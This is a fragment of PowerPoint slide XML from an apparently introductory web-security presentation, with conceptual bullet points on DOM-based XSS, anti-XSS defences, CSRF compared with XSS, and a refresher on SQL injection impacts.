          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Comments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4960AE8-BFE4-0644-B278-6D698C84B4CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7871314" y="174207"/>
            <a:ext cx="3739038" cy="3849591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358805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B4D5-BEA9-3C4F-BD61-BDCE1888BC0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dom based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662874CD-2CF1-7949-8D32-8D5778C93D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1140521" y="2030226"/>
            <a:ext cx="3208735" cy="2430936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Similar to reflective. Except DOM doesn’t actually relying on the browser directly to take that value and execute it as JavaScript, but instead relying on the Document Object Model within the browser to actually parse the value and execute it that way. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C577F3-2053-5847-BCD6-40AF5A481197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3920586" y="4118262"/>
            <a:ext cx="3194968" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B50F5CB-DA99-CA44-84FA-A5CB7440183B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3920586" y="4804062"/>
            <a:ext cx="3194968" cy="2430936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Not Immediate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In other words DOM is sneaky/tricky</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD09705-8FE7-C64B-9996-88A5A358B3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6673931" y="266701"/>
            <a:ext cx="5290535" cy="3851561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80521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A174-C140-9843-B415-82C2E38ACE10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41720FCE-D847-E944-9B69-CBC5F31C7D90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Libraries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D20ACA00-1ACA-4E40-ABB5-7095012D142D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.NET anti-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SAPID for JAVA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6FD9AC1-859B-CD46-AD7C-9538BC61E7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>TOOLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57494BD7-BFCC-E34F-8C52-ED633062BE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Viewing Engines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Razor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA32D26B-7400-2E40-94D0-C3B1CF03C861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Knowledge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F0D5908-D065-A541-B263-46B2A3FE5B74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7852442" y="3360263"/>
            <a:ext cx="3194968" cy="2430936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Be an Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6AEEB34-6215-5A44-8735-48D6A88547A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038247" y="0"/>
            <a:ext cx="2823358" cy="2674463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D68FB7-7846-CF4F-92AD-ADF50818F2B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013860" y="609600"/>
            <a:ext cx="3372592" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>“The only defense against the world is a thorough knowledge of it.” </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185115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3F67-0633-499B-B7FB-9E65A28762DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13EB1249-B934-409F-A668-0C7AD4A1D2D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stealing your login one click at a time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121825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85A4E-0F0A-4D72-A8B1-BBAF5046C4CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is CSRF?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F144548C-C4EC-45DE-BE0E-5FA4297E3BF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also known as session riding, one-click attack, “see serf”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Abbreviated CSRF, XSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Highjacks state-changing operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relies on the server’s “blind trust” of a website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tends to be more small scale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Individualized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executed through user error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281616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F23D-5E46-4F88-A434-D08A334FDBD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting’s “Little Brother”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEA4DFF8-F4C8-472D-A86A-3A9FEAFDF0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E34EBA65-8EE3-42AA-878F-D5477E54A64B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically affects a small number of individuals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires social engineering to execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Affects browser-side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03CE6D39-C145-43B3-91B6-70C183DB7C87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71365CE5-663B-4734-9AEE-C8CCAE43B727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can affect large amounts of users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be executed automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Affects server-side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186334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3E5B-9369-4FED-81A8-72ED721DE12D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Refresher</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9770EC4-557B-44A8-B02B-A6383CCE9589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr numCol="2">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL Injection has to exploit a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Accomplishes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can spoof identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tamper data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disclosure of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delete data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Become Admin of a server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In 2017 Injection (SQL) was OWASP #1 Threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104633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8083-7562-44E0-BBA3-2F806D531460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
